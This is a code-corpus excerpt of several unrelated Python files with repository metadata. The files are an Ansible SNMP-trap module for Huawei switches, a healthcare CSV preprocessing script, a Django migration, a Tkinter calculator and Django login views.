argument_spec = kwargs["argument_spec"]
self.spec = argument_spec
self.module = AnsibleModule(
argument_spec=self.spec,
required_together=[("interface_type", "interface_number")],
supports_check_mode=True
)
# config
self.cur_cfg = dict()
self.cur_cfg["snmp-agent trap"] = []
self.cur_cfg["undo snmp-agent trap"] = []
# module args
self.state = self.module.params['state']
self.feature_name = self.module.params['feature_name']
self.trap_name = self.module.params['trap_name']
self.interface_type = self.module.params['interface_type']
self.interface_number = self.module.params['interface_number']
self.port_number = self.module.params['port_number']
# state
self.changed = False
self.updates_cmd = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.existing["snmp-agent trap"] = []
self.existing["undo snmp-agent trap"] = []
self.end_state = dict()
self.end_state["snmp-agent trap"] = []
self.end_state["undo snmp-agent trap"] = []
commands = list()
cmd1 = 'display interface brief'
commands.append(cmd1)
self.interface = run_commands(self.module, commands)
def check_args(self):
""" Check invalid args """
if self.port_number:
if self.port_number.isdigit():
if int(self.port_number) < 1025 or int(self.port_number) > 65535:
self.module.fail_json(
msg='Error: The value of port_number is out of [1025 - 65535].')
else:
self.module.fail_json(
msg='Error: The port_number is not digit.')
if self.interface_type and self.interface_number:
tmp_interface = self.interface_type + self.interface_number
if tmp_interface not in self.interface[0]:
self.module.fail_json(
msg='Error: The interface %s is not in the device.' % tmp_interface)
def get_proposed(self):
""" Get proposed state """
self.proposed["state"] = self.state
if self.feature_name:
self.proposed["feature_name"] = self.feature_name
if self.trap_name:
self.proposed["trap_name"] = self.trap_name
if self.interface_type:
self.proposed["interface_type"] = self.interface_type
if self.interface_number:
self.proposed["interface_number"] = self.interface_number
if self.port_number:
self.proposed["port_number"] = self.port_number
def get_existing(self):
""" Get existing state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_cfg_lower = tmp_cfg.lower()
temp_data = tmp_cfg.split("\n")
temp_data_lower = temp_cfg_lower.split("\n")
for item in temp_data:
if "snmp-agent trap source-port " in item:
if self.port_number:
item_tmp = item.split("snmp-agent trap source-port ")
self.cur_cfg["trap source-port"] = item_tmp[1]
self.existing["trap source-port"] = item_tmp[1]
elif "snmp-agent trap source " in item:
if self.interface_type:
item_tmp = item.split("snmp-agent trap source ")
self.cur_cfg["trap source interface"] = item_tmp[1]
self.existing["trap source interface"] = item_tmp[1]
if self.feature_name:
for item in temp_data_lower:
if item == "snmp-agent trap enable":
self.cur_cfg["snmp-agent trap"].append("enable")
self.existing["snmp-agent trap"].append("enable")
elif item == "snmp-agent trap disable":
self.cur_cfg["snmp-agent trap"].append("disable")
self.existing["snmp-agent trap"].append("disable")
elif "undo snmp-agent trap enable " in item:
item_tmp = item.split("undo snmp-agent trap enable ")
self.cur_cfg[
"undo snmp-agent trap"].append(item_tmp[1])
self.existing[
"undo snmp-agent trap"].append(item_tmp[1])
elif "snmp-agent trap enable " in item:
item_tmp = item.split("snmp-agent trap enable ")
self.cur_cfg["snmp-agent trap"].append(item_tmp[1])
self.existing["snmp-agent trap"].append(item_tmp[1])
else:
del self.existing["snmp-agent trap"]
del self.existing["undo snmp-agent trap"]
def get_end_state(self):
""" Get end_state state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_cfg_lower = tmp_cfg.lower()
temp_data = tmp_cfg.split("\n")
temp_data_lower = temp_cfg_lower.split("\n")
for item in temp_data:
if "snmp-agent trap source-port " in item:
if self.port_number:
item_tmp = item.split("snmp-agent trap source-port ")
self.end_state["trap source-port"] = item_tmp[1]
elif "snmp-agent trap source " in item:
if self.interface_type:
item_tmp = item.split("snmp-agent trap source ")
self.end_state["trap source interface"] = item_tmp[1]
if self.feature_name:
for item in temp_data_lower:
if item == "snmp-agent trap enable":
self.end_state["snmp-agent trap"].append("enable")
elif item == "snmp-agent trap disable":
self.end_state["snmp-agent trap"].append("disable")
elif "undo snmp-agent trap enable " in item:
item_tmp = item.split("undo snmp-agent trap enable ")
self.end_state[
"undo snmp-agent trap"].append(item_tmp[1])
elif "snmp-agent trap enable " in item:
item_tmp = item.split("snmp-agent trap enable ")
self.end_state["snmp-agent trap"].append(item_tmp[1])
else:
del self.end_state["snmp-agent trap"]
del self.end_state["undo snmp-agent trap"]
def cli_load_config(self, commands):
""" Load configure through cli """
if not self.module.check_mode:
load_config(self.module, commands)
def cli_get_config(self):
""" Get configure through cli """
regular = "| include snmp | include trap"
flags = list()
flags.append(regular)
tmp_cfg = get_config(self.module, flags)
return tmp_cfg
def set_trap_feature_name(self):
""" Set feature name for trap """
if self.feature_name == "all":
cmd = "snmp-agent trap enable"
else:
cmd = "snmp-agent trap enable feature-name %s" % self.feature_name
if self.trap_name:
cmd += " trap-name %s" % self.trap_name
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_trap_feature_name(self):
""" Undo feature name for trap """
if self.feature_name == "all":
cmd = "undo snmp-agent trap enable"
else:
cmd = "undo snmp-agent trap enable feature-name %s" % self.feature_name
if self.trap_name:
cmd += " trap-name %s" % self.trap_name
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def set_trap_source_interface(self):
""" Set source interface for trap """
cmd = "snmp-agent trap source %s %s" % (
self.interface_type, self.interface_number)
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_trap_source_interface(self):
""" Undo source interface for trap """
cmd = "undo snmp-agent trap source"
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def set_trap_source_port(self):
""" Set source port for trap """
cmd = "snmp-agent trap source-port %s" % self.port_number
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_trap_source_port(self):
""" Undo source port for trap """
cmd = "undo snmp-agent trap source-port"
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def work(self):
""" The work function """
self.check_args()
self.get_proposed()
self.get_existing()
find_flag = False
find_undo_flag = False
tmp_interface = None
if self.state == "present":
if self.feature_name:
if self.trap_name:
tmp_cfg = "feature-name %s trap-name %s" % (
self.feature_name, self.trap_name.lower())
else:
tmp_cfg = "feature-name %s" % self.feature_name
find_undo_flag = False
if self.cur_cfg["undo snmp-agent trap"]:
for item in self.cur_cfg["undo snmp-agent trap"]:
if item == tmp_cfg:
find_undo_flag = True
elif tmp_cfg in item:
find_undo_flag = True
elif self.feature_name == "all":
find_undo_flag = True
if find_undo_flag:
self.set_trap_feature_name()
if not find_undo_flag:
find_flag = False
if self.cur_cfg["snmp-agent trap"]:
for item in self.cur_cfg["snmp-agent trap"]:
if item == "enable":
find_flag = True
elif item == tmp_cfg:
find_flag = True
if not find_flag:
self.set_trap_feature_name()
if self.interface_type:
find_flag = False
tmp_interface = self.interface_type + self.interface_number
if "trap source interface" in self.cur_cfg.keys():
if self.cur_cfg["trap source interface"] == tmp_interface:
find_flag = True
if not find_flag:
self.set_trap_source_interface()
if self.port_number:
find_flag = False
if "trap source-port" in self.cur_cfg.keys():
if self.cur_cfg["trap source-port"] == self.port_number:
find_flag = True
if not find_flag:
self.set_trap_source_port()
else:
if self.feature_name:
if self.trap_name:
tmp_cfg = "feature-name %s trap-name %s" % (
self.feature_name, self.trap_name.lower())
else:
tmp_cfg = "feature-name %s" % self.feature_name
find_flag = False
if self.cur_cfg["snmp-agent trap"]:
for item in self.cur_cfg["snmp-agent trap"]:
if item == tmp_cfg:
find_flag = True
elif item == "enable":
find_flag = True
elif tmp_cfg in item:
find_flag = True
else:
find_flag = True
find_undo_flag = False
if self.cur_cfg["undo snmp-agent trap"]:
for item in self.cur_cfg["undo snmp-agent trap"]:
if item == tmp_cfg:
find_undo_flag = True
elif tmp_cfg in item:
find_undo_flag = True
if find_undo_flag:
pass
elif find_flag:
self.undo_trap_feature_name()
if self.interface_type:
if "trap source interface" in self.cur_cfg.keys():
self.undo_trap_source_interface()
if self.port_number:
if "trap source-port" in self.cur_cfg.keys():
self.undo_trap_source_port()
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
self.results['updates'] = self.updates_cmd
self.module.exit_json(**self.results)
def main():
""" Module main """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
feature_name=dict(choices=['aaa', 'arp', 'bfd', 'bgp', 'cfg', 'configuration', 'dad',
'devm', 'dhcpsnp', 'dldp', 'driver', 'efm', 'erps', 'error-down',
'fcoe', 'fei', 'fei_comm', 'fm', 'ifnet', 'info', 'ipsg', 'ipv6',
'isis', 'l3vpn', 'lacp', 'lcs', 'ldm', 'ldp', 'ldt', 'lldp',
'mpls_lspm', 'msdp', 'mstp', 'nd', 'netconf', 'nqa', 'nvo3',
'openflow', 'ospf', 'ospfv3', 'pim', 'pim-std', 'qos', 'radius',
'rm', 'rmon', 'securitytrap', 'smlktrap', 'snmp', 'ssh', 'stackmng',
'sysclock', 'sysom', 'system', 'tcp', 'telnet', 'trill', 'trunk',
'tty', 'vbst', 'vfs', 'virtual-perception', 'vrrp', 'vstm', 'all']),
trap_name=dict(type='str'),
interface_type=dict(choices=['Ethernet', 'Eth-Trunk', 'Tunnel', 'NULL', 'LoopBack', 'Vlanif',
'100GE', '40GE', 'MTunnel', '10GE', 'GE', 'MEth', 'Vbdif', 'Nve']),
interface_number=dict(type='str'),
port_number=dict(type='str')
)
argument_spec.update(ce_argument_spec)
module = SnmpTraps(argument_spec=argument_spec)
module.work()
if __name__ == '__main__':
main()
| 0 | 0 | 0 |
e900cb25ac311208e0b435f3e7039d91abadad7f | 7,435 | py | Python | scripts/process-files.py | IBM/cpd-workshop-health-care | 5c84be0a3557578aada7616023ae439d4033eb34 | [
"Apache-2.0"
] | 2 | 2020-11-11T08:32:27.000Z | 2020-12-15T16:56:00.000Z | scripts/process-files.py | IBM/cpd-workshop-health-care | 5c84be0a3557578aada7616023ae439d4033eb34 | [
"Apache-2.0"
] | 1 | 2020-12-08T22:36:25.000Z | 2020-12-08T22:36:25.000Z | scripts/process-files.py | IBM/cpd-workshop-health-care | 5c84be0a3557578aada7616023ae439d4033eb34 | [
"Apache-2.0"
] | 1 | 2021-05-13T06:26:45.000Z | 2021-05-13T06:26:45.000Z | import csv
import datetime
import random
import sys
import os
import time
import argparse
import pandas as pd
import json
from pyspark.sql import SparkSession
from pyspark.sql.functions import col
BASE_DIR = "/Users/jrtorres/Documents/JRTDocs/Development/General_Projects/cpd-workshop-health-care/data/"
OUTPUT_DIR = "/Users/jrtorres/tmp/"
LOINC_CODES_NAMES = {
"8302-2": "Height",
"29463-7": "Weight",
"6690-2": "Leukocytes",
"789-8": "Erythrocytes",
"718-7": "Hemoglobin",
"4544-3": "Hematocrit",
"787-2": "MCV",
"785-6": "MCH",
"786-4": "MCHC",
"777-3": "Platelets",
"8462-4": "Diastolic Blood Pressure",
"8480-6": "Systolic Blood Pressure",
"39156-5": "Body Mass Index",
"2093-3": "Total Cholesterol",
"2571-8": "Triglycerides",
"18262-6": "LDL Cholesterol",
"2085-9": "HDL Cholesterol",
"4548-4": "A1c Hemoglobin Total",
"2339-0": "Glucose",
"6299-2": "Urea Nitrogen",
"38483-4": "Creatinine",
"49765-1": "Calcium",
"2947-0": "Sodium",
"6298-4": "Potassium",
"2069-3": "Chloride",
"20565-8": "Carbon Dioxide",
"14959-1": "Microalbumin Creatinine Ratio",
"38265-5": "DXA Bone density",
"26464-8": "White Blood Cell",
"26453-1": "Red Blood Cell",
"30385-9": "RBC Distribution Width",
"26515-7": "Platelet Count"
}
if __name__ == "__main__":
if sys.version_info[0] < 3:
raise Exception("Python 3 or higher version is required for this script.")
parser = argparse.ArgumentParser(prog="python %s)" % os.path.basename(__file__), description="Script that manages healthcare dataset.")
parser.add_argument("-output-base-directory", dest="out_base_dir", required=False, default=None, help="Directory to store output files.")
parser.add_argument("-input-base-directory", dest="in_base_dir", required=False, default=None, help="Directory with healthcare data set.")
parser.add_argument("-num-patients", dest="num_records", required=False, type=int, default=0, help="Number of patients.")
print("Starting script.\n")
args = parser.parse_args()
started_time = time.time()
if args.num_records is not 0:
subset_files_by_patient(args.num_records)
#print_unique_observation_codedescriptions("/Users/jrtorres/tmp/observations_small.csv")
#transpose_observations("/Users/jrtorres/tmp/observations_small_test.csv", "/Users/jrtorres/tmp/test_process_obs2.csv")
transpose_observations(BASE_DIR+"observations.csv", OUTPUT_DIR+"observations_processed.csv")
elapsed = time.time() - started_time
print("\nFinished script. Elapsed time: %f" % elapsed)
| 49.238411 | 160 | 0.689307 | import csv
import datetime
import random
import sys
import os
import time
import argparse
import pandas as pd
import json
from pyspark.sql import SparkSession
from pyspark.sql.functions import col
BASE_DIR = "/Users/jrtorres/Documents/JRTDocs/Development/General_Projects/cpd-workshop-health-care/data/"
OUTPUT_DIR = "/Users/jrtorres/tmp/"
LOINC_CODES_NAMES = {
"8302-2": "Height",
"29463-7": "Weight",
"6690-2": "Leukocytes",
"789-8": "Erythrocytes",
"718-7": "Hemoglobin",
"4544-3": "Hematocrit",
"787-2": "MCV",
"785-6": "MCH",
"786-4": "MCHC",
"777-3": "Platelets",
"8462-4": "Diastolic Blood Pressure",
"8480-6": "Systolic Blood Pressure",
"39156-5": "Body Mass Index",
"2093-3": "Total Cholesterol",
"2571-8": "Triglycerides",
"18262-6": "LDL Cholesterol",
"2085-9": "HDL Cholesterol",
"4548-4": "A1c Hemoglobin Total",
"2339-0": "Glucose",
"6299-2": "Urea Nitrogen",
"38483-4": "Creatinine",
"49765-1": "Calcium",
"2947-0": "Sodium",
"6298-4": "Potassium",
"2069-3": "Chloride",
"20565-8": "Carbon Dioxide",
"14959-1": "Microalbumin Creatinine Ratio",
"38265-5": "DXA Bone density",
"26464-8": "White Blood Cell",
"26453-1": "Red Blood Cell",
"30385-9": "RBC Distribution Width",
"26515-7": "Platelet Count"
}
def subset_files_by_patient(num_patients, base_directory=BASE_DIR, output_directory=OUTPUT_DIR):
patients_df = pd.read_csv(base_directory + "/patients.csv")
allergies_df = pd.read_csv(base_directory + "/allergies.csv")
conditions_df = pd.read_csv(base_directory + "/conditions.csv")
encounters_df = pd.read_csv(base_directory + "/encounters.csv")
immunizations_df = pd.read_csv(base_directory + "/immunizations.csv")
medications_df = pd.read_csv(base_directory + "/medications.csv")
observations_df = pd.read_csv(base_directory + "/observations.csv")
patients_small_df = patients_df[:num_patients]
# Files with just patient related data
allergies_small_df = allergies_df[allergies_df["PATIENT"].isin(patients_small_df["ID"])]
conditions_small_df = conditions_df[conditions_df["PATIENT"].isin(patients_small_df["ID"])]
encounters_small_df = encounters_df[encounters_df["PATIENT"].isin(patients_small_df["ID"])]
immunizations_small_df = immunizations_df[immunizations_df["PATIENT"].isin(patients_small_df["ID"])]
medications_small_df = medications_df[medications_df["PATIENT"].isin(patients_small_df["ID"])]
observations_small_df = observations_df[observations_df["PATIENT"].isin(patients_small_df["ID"])]
print("Patients: ", patients_df.shape, "\t\tPatients Subset: ", patients_small_df.shape)
print("Allergies: ", allergies_df.shape, "\t\tAllergies Subset: ", allergies_small_df.shape)
print("Conditions: ", conditions_df.shape, "\t\tConditions Subset: ", conditions_small_df.shape)
print("Encounters: ", encounters_df.shape, "\t\tEncounters Subset ", encounters_small_df.shape)
print("Immunizations: ", immunizations_df.shape, "\t\tImmunizations Subset ", immunizations_small_df.shape)
print("Medications: ", medications_df.shape, "\t\tMedications Subset: ", medications_small_df.shape)
print("Observations: ", observations_df.shape, "\t\tObservations Subset: ", observations_small_df.shape)
try:
patients_small_df.to_csv(output_directory + "/patients.csv", index=False)
allergies_small_df.to_csv(output_directory + "/allergies.csv", index=False)
conditions_small_df.to_csv(output_directory + "/conditions.csv", index=False)
encounters_small_df.to_csv(output_directory + "/encounters.csv", index=False)
immunizations_small_df.to_csv(output_directory + "/immunizations.csv", index=False)
medications_small_df.to_csv(output_directory + "/medications.csv", index=False)
observations_small_df.to_csv(output_directory + "/observations.csv", index=False)
except Error as e:
print("Error: ", e)
def print_unique_observation_codedescriptions(observation_fname):
observations_df = pd.read_csv(observation_fname)
print("Total number of observations: ", len(observations_df))
codes = observations_df.CODE.unique()
print("Number of unique observation codes: ", len(codes))
for c in codes:
t_df = observations_df[observations_df.CODE == c].iloc[0]
print('{:15s} {}'.format(c, t_df.loc['DESCRIPTION']))
def transpose_observations(observation_fname, output_fname):
observations_df = pd.read_csv(observation_fname)
#cur_obs_df = observations_df[observations_df["CODE"].isin(list(loinc_observations.keys()))].filter(items=["DATE", "PATIENT", "ENCOUNTER", "VALUE", "CODE"])
#cur_obs_df.to_csv("/Users/jrtorres/tmp/test_process_obs.csv", index=False)
final_observations_df = pd.DataFrame() #None
for loinc_code, obs_name in LOINC_CODES_NAMES.items():
print("========================================================")
print("Starting columns: ", list(final_observations_df))
col_name = obs_name + " [" + loinc_code + "]"
#print("Capturing Code: ", loinc_code, "Column Name: ", col_name)
cur_obs_df = pd.DataFrame()
cur_obs_df = observations_df[observations_df["CODE"] == loinc_code].filter(items=["DATE", "PATIENT", "ENCOUNTER", "VALUE"])
cur_obs_df.rename(columns = {'VALUE':col_name.upper()}, inplace = True)
if final_observations_df.empty:
final_observations_df = cur_obs_df.copy()
else:
if not cur_obs_df.empty:
print("Attemptin merge of: ", list(cur_obs_df))
final_observations_df = pd.merge(final_observations_df, cur_obs_df, on=["DATE","PATIENT", "ENCOUNTER"], how="outer")
else:
print("No observations for: ", col_name)
print("Ending columns: ", list(final_observations_df))
print("========================================================")
print("Final Schema: ")
final_observations_df.info()
final_observations_df.to_csv(output_fname, index=False)
if __name__ == "__main__":
if sys.version_info[0] < 3:
raise Exception("Python 3 or higher version is required for this script.")
parser = argparse.ArgumentParser(prog="python %s)" % os.path.basename(__file__), description="Script that manages healthcare dataset.")
parser.add_argument("-output-base-directory", dest="out_base_dir", required=False, default=None, help="Directory to store output files.")
parser.add_argument("-input-base-directory", dest="in_base_dir", required=False, default=None, help="Directory with healthcare data set.")
parser.add_argument("-num-patients", dest="num_records", required=False, type=int, default=0, help="Number of patients.")
print("Starting script.\n")
args = parser.parse_args()
started_time = time.time()
if args.num_records is not 0:
subset_files_by_patient(args.num_records)
#print_unique_observation_codedescriptions("/Users/jrtorres/tmp/observations_small.csv")
#transpose_observations("/Users/jrtorres/tmp/observations_small_test.csv", "/Users/jrtorres/tmp/test_process_obs2.csv")
transpose_observations(BASE_DIR+"observations.csv", OUTPUT_DIR+"observations_processed.csv")
elapsed = time.time() - started_time
print("\nFinished script. Elapsed time: %f" % elapsed)
| 4,695 | 0 | 69 |
f9cdc76f722ac504441daaa3a2cc12b337f137b8 | 584 | py | Python | evap/evaluation/migrations/0066_rename_course_is_required_for_reward.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 29 | 2020-02-28T23:03:41.000Z | 2022-02-19T09:29:36.000Z | evap/evaluation/migrations/0066_rename_course_is_required_for_reward.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 737 | 2015-01-02T17:43:25.000Z | 2018-12-10T20:45:10.000Z | evap/evaluation/migrations/0066_rename_course_is_required_for_reward.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 83 | 2015-01-14T12:39:41.000Z | 2018-10-29T16:36:43.000Z | # Generated by Django 2.0.5 on 2018-05-08 17:52
from django.db import migrations, models
| 22.461538 | 79 | 0.597603 | # Generated by Django 2.0.5 on 2018-05-08 17:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('evaluation', '0065_questionnaire_type'),
]
operations = [
migrations.RenameField(
model_name='course',
old_name='is_required_for_reward',
new_name='is_rewarded',
),
migrations.AlterField(
model_name='course',
name='is_rewarded',
field=models.BooleanField(default=True, verbose_name='is rewarded')
),
]
| 0 | 470 | 23 |
58c2741b98c4a786da6cb5614ef1568fb36b7ea4 | 3,474 | py | Python | calculator.py | arpansarkar190794/Arpan_Sarkar | b36f66f0ed00668b005fae903ce463883a803fd5 | [
"bzip2-1.0.6"
] | null | null | null | calculator.py | arpansarkar190794/Arpan_Sarkar | b36f66f0ed00668b005fae903ce463883a803fd5 | [
"bzip2-1.0.6"
] | null | null | null | calculator.py | arpansarkar190794/Arpan_Sarkar | b36f66f0ed00668b005fae903ce463883a803fd5 | [
"bzip2-1.0.6"
] | null | null | null | from tkinter import *
root = Tk()
my_gui = Calculator(root)
root.mainloop()
| 36.568421 | 127 | 0.578008 | from tkinter import *
class Calculator:
def __init__(self, master):
self.master = master
master.title("Python Calculator")
# create screen widget
self.screen = Text(master, state='disabled', width=30, height=3, background="yellow", foreground="blue")
# position screen in window
self.screen.grid(row=0, column=0, columnspan=4, padx=5, pady=5)
self.screen.configure(state='normal')
# initialize screen value as empty
self.equation = ''
# create buttons using method createButton
b1 = self.createButton(7)
b2 = self.createButton(8)
b3 = self.createButton(9)
b4 = self.createButton(u"\u232B", None)
b5 = self.createButton(4)
b6 = self.createButton(5)
b7 = self.createButton(6)
b8 = self.createButton(u"\u00F7")
b9 = self.createButton(1)
b10 = self.createButton(2)
b11 = self.createButton(3)
b12 = self.createButton('*')
b13 = self.createButton('.')
b14 = self.createButton(0)
b15 = self.createButton('+')
b16 = self.createButton('-')
b17 = self.createButton('=', None, 34)
# buttons stored in list
buttons = [b1, b2, b3, b4, b5, b6, b7, b8, b9, b10, b11, b12, b13, b14, b15, b16, b17]
# intialize counter
count = 0
# arrange buttons with grid manager
for row in range(1, 5):
for column in range(4):
buttons[count].grid(row=row, column=column)
count += 1
# arrange last button '=' at the bottom
buttons[16].grid(row=5, column=0, columnspan=4)
def createButton(self, val, write=True, width=7):
# this function creates a button, and takes one compulsory argument, the value that should be on the button
return Button(self.master, text=val, command=lambda: self.click(val, write), width=width)
def click(self, text, write):
# this function handles what happens when you click a button
# 'write' argument if True means the value 'val' should be written on screen, if None, should not be written on screen
if write == None:
# only evaluate code when there is an equation to be evaluated
if text == '=' and self.equation:
# replace the unicode value of division ./.with python division symbol / using regex
self.equation = re.sub(u"\u00F7", '/', self.equation)
print(self.equation)
answer = str(eval(self.equation))
self.clear_screen()
self.insert_screen(answer, newline=True)
elif text == u"\u232B":
self.clear_screen()
else:
# add text to screen
self.insert_screen(text)
def clear_screen(self):
# to clear screen
# set equation to empty before deleting screen
self.equation = ''
self.screen.configure(state='normal')
self.screen.delete('1.0', END)
def insert_screen(self, value, newline=False):
self.screen.configure(state='normal')
self.screen.insert(END, value)
# record every value inserted in screen
self.equation += str(value)
self.screen.configure(state='disabled')
root = Tk()
my_gui = Calculator(root)
root.mainloop()
| 3,224 | -4 | 168 |
3d2916b1202748e89e7c4eb47fac405f50630f2f | 2,620 | py | Python | web_frontend/views.py | Nucleoos/condor-copasi | dcf069cfdb7ce9a5198b5fd495f98fa6433310ca | [
"Artistic-2.0"
] | 3 | 2020-09-11T13:06:52.000Z | 2022-02-21T15:03:17.000Z | web_frontend/views.py | Nucleoos/condor-copasi | dcf069cfdb7ce9a5198b5fd495f98fa6433310ca | [
"Artistic-2.0"
] | null | null | null | web_frontend/views.py | Nucleoos/condor-copasi | dcf069cfdb7ce9a5198b5fd495f98fa6433310ca | [
"Artistic-2.0"
] | 2 | 2016-10-17T00:22:23.000Z | 2021-12-20T13:12:54.000Z | from django.shortcuts import render_to_response
import datetime, pickle, os
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from web_frontend import settings
from django.core.urlresolvers import reverse
| 34.933333 | 156 | 0.675573 | from django.shortcuts import render_to_response
import datetime, pickle, os
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from web_frontend import settings
from django.core.urlresolvers import reverse
def mainPage(request):
pageTitle = 'Home'
#Attempt to load the queue status from user_files/condor_status.pickle
try:
pickle_filename = os.path.join(settings.USER_FILES_DIR, 'condor_status.pickle')
pickle_file = open(pickle_filename, 'r')
status = pickle.load(pickle_file)
pickle_file.close()
except:
pass
if settings.CONDOR_POOL_STATUS != '':
pool_status_page = settings.CONDOR_POOL_STATUS
return render_to_response('index.html', locals(), RequestContext(request))
def helpPage(request):
pageTitle = 'Help'
return render_to_response('help.html', locals(), RequestContext(request))
class LoginForm(forms.Form):
username = forms.CharField(label='Username')
password = forms.CharField(label='Password',widget=forms.PasswordInput(render_value=False))
def loginPage(request):
if request.user.is_authenticated():
return HttpResponseRedirect(settings.SITE_SUBFOLDER)
login_failure = False
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
cd = form.cleaned_data
username = cd['username']
password = cd['password']
user = authenticate(username=username, password=password)
if user is not None:
#Successfully authenticated - log in
login(request, user)
try:
return HttpResponseRedirect(request.GET['next'])
except:
return HttpResponseRedirect(reverse('index'))
else:
#Login unsuccsessful
login_failure = True
else:
form = LoginForm()
pageTitle = 'Login'
return render_to_response('login.html', {'pageTitle': pageTitle, 'login_failure': login_failure, 'form':form}, context_instance=RequestContext(request))
def logoutPage(request):
#Logout
logout(request)
return HttpResponseRedirect(reverse('index'))
def handle_error(request, pageTitle, errors=[]):
return render_to_response('500.html', locals(), context_instance=RequestContext(request))
| 1,870 | 152 | 147 |
860f452e421076522902caa2d22053f6e0ab955f | 256 | py | Python | tools/mo/openvino/tools/mo/mo.py | IndiraSalyahova/openvino | ff2df42339e15645dc89095d4cd8ff032b4da250 | [
"Apache-2.0"
] | null | null | null | tools/mo/openvino/tools/mo/mo.py | IndiraSalyahova/openvino | ff2df42339e15645dc89095d4cd8ff032b4da250 | [
"Apache-2.0"
] | null | null | null | tools/mo/openvino/tools/mo/mo.py | IndiraSalyahova/openvino | ff2df42339e15645dc89095d4cd8ff032b4da250 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
if __name__ == "__main__":
from subprocess_main import subprocess_main # pylint: disable=no-name-in-module
subprocess_main(framework=None)
| 25.6 | 84 | 0.75 | #!/usr/bin/env python3
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
if __name__ == "__main__":
from subprocess_main import subprocess_main # pylint: disable=no-name-in-module
subprocess_main(framework=None)
| 0 | 0 | 0 |
fb62a66aba2ec478de9863a72671723cf3ae7f93 | 318 | py | Python | recruiter/permissions.py | b1pb1p/opensource-job-portal | 26aaf8415ed27112b94f4111d5136ec6f65b2205 | [
"MIT"
] | 199 | 2019-12-14T02:25:05.000Z | 2022-03-31T11:26:12.000Z | recruiter/permissions.py | sajib1066/opensource-job-portal | 1288046e32f009c38742a28e4552ffafafabf684 | [
"MIT"
] | 91 | 2019-12-12T12:19:34.000Z | 2022-03-25T05:52:04.000Z | recruiter/permissions.py | sajib1066/opensource-job-portal | 1288046e32f009c38742a28e4552ffafafabf684 | [
"MIT"
] | 131 | 2019-12-13T06:26:06.000Z | 2022-03-29T19:45:18.000Z | from rest_framework import permissions
| 31.8 | 77 | 0.726415 | from rest_framework import permissions
class RecruiterRequiredPermission(permissions.BasePermission):
def has_permission(self, request, view):
if request.user.is_authenticated:
if request.user.is_recruiter or request.user.is_agency_recruiter:
return True
return False
| 188 | 41 | 49 |
d0a137dc28fc14372d955c6d37be2c48ed58ce87 | 1,269 | py | Python | Day_25/inheritance.py | kiranrraj/100Days_Of_Coding | ab75d83be9be87fb7bc83a3f3b72a4638dab22a1 | [
"MIT"
] | null | null | null | Day_25/inheritance.py | kiranrraj/100Days_Of_Coding | ab75d83be9be87fb7bc83a3f3b72a4638dab22a1 | [
"MIT"
] | null | null | null | Day_25/inheritance.py | kiranrraj/100Days_Of_Coding | ab75d83be9be87fb7bc83a3f3b72a4638dab22a1 | [
"MIT"
] | null | null | null | # Title : Inheritance
# Author : Kiran Raj R.
# Date : 08:11:2020
import math
class Polygon:
"Create a simply polygon class, which takes number of sites and takes the maginute of each sides"
# triangle = Polygon(3)
# # triangle.get_sides()
# # triangle.print_sides()
triangle1 = Triangle()
triangle1.get_sides()
triangle1.findArea()
| 28.840909 | 107 | 0.603625 | # Title : Inheritance
# Author : Kiran Raj R.
# Date : 08:11:2020
import math
class Polygon:
"Create a simply polygon class, which takes number of sites and takes the maginute of each sides"
def __init__(self, num_sides):
self.num_sides = int(num_sides)
self.mag_sides = []
def get_sides(self):
self.mag_sides = [float(input(f"Enter the value for side {i+1}: ")) for i in range(self.num_sides)]
def print_sides(self):
if len(self.mag_sides) == 0:
print("No sides entered")
return
print(f"The polygon have {self.num_sides} sides")
for i in range(self.num_sides):
print(f"The side {i+1} is {self.mag_sides[i]}")
class Triangle(Polygon):
def __init__(self):
Polygon.__init__(self,3)
def findArea(self):
a,b,c = self.mag_sides
# print(self.mag_sides)
sum_s = (a+b+c) / 2
# print(sum_s)
product = sum_s * ((sum_s-a) * (sum_s-b) * (sum_s-c))
area = math.sqrt(product)
print(f"The area of the triangle with sides {a}, {b}, {c} is {area}")
# triangle = Polygon(3)
# # triangle.get_sides()
# # triangle.print_sides()
triangle1 = Triangle()
triangle1.get_sides()
triangle1.findArea()
| 754 | 3 | 168 |
63a5dda4dfc333b4824d2a196607eff046eabd58 | 2,685 | py | Python | tools/request_sender.py | gusutabopb/pytrthree | 6c036e6ba44793261dea6017091423af3624050c | [
"MIT"
] | 2 | 2018-09-02T04:46:36.000Z | 2020-11-28T18:28:35.000Z | tools/request_sender.py | gusutabopb/pytrthree | 6c036e6ba44793261dea6017091423af3624050c | [
